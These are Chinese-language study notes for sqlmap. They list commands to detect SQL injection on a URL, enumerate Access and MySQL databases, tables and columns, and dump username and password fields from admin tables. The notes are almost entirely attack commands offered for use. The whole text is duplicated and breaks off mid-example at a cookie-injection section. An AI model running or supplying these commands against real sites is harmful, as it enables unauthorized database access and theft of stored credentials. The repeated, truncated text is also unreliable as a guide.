sqlmap学习笔记
sqlmap.py -u "URL" #判断是否存在注入
出现 “please enter number of threads?” 设置跑表的线程 对于Access数据库 本屌是建议大点 一般10差不多
对于cookie注入线程放小,要不然出现报错,一般为5,
终止注入:Ctrl+C
一: Access数据库注入
sqlmap.py -u "URL" --tables #跑表
sqlmap.py -u "URL" --columns -T admin #对admin表里的字段猜解
sqlmap.py -u "URL" --dump -T admin -C "username,password" #列出admin表里面username,passwrod的内容
二:Mysql数据库注入
sqlmap.py -u "URL" --dbs #猜解数据库
sqlmap.py -u "URL" -D mysl #mysl是猜解出来的数据库,-D 指定一个数据库
sqlmap.py -u "URL" -D mysl -T my_admin --columns #获取my_admin表里面的字段,
sqlmap.py -u "URL" -D mysl -T my_admin -C id,user,password #获取id,user,password的内容
三:Cookie注入
例如注入点为:www.xxx.com/new_asp.a
sqlmap.py -u "URL" #判断是否存在注入
出现 “please enter number of threads?” 设置跑表的线程 对于Access数据库 本屌是建议大点 一般10差不多
对于cookie注入线程放小,要不然出现报错,一般为5,
终止注入:Ctrl+C
一: Access数据库注入
sqlmap.py -u "URL" --tables #跑表
sqlmap.py -u "URL" --columns -T admin #对admin表里的字段猜解
sqlmap.py -u "URL" --dump -T admin -C "username,password" #列出admin表里面username,passwrod的内容
二:Mysql数据库注入
sqlmap.py -u "URL" --dbs #猜解数据库
sqlmap.py -u "URL" -D mysl #mysl是猜解出来的数据库,-D 指定一个数据库
sqlmap.py -u "URL" -D mysl -T my_admin --columns #获取my_admin表里面的字段,
sqlmap.py -u "URL" -D mysl -T my_admin -C id,user,password #获取id,user,password的内容
三:Cookie注入
例如注入点为:www.xxx.com/new_asp.a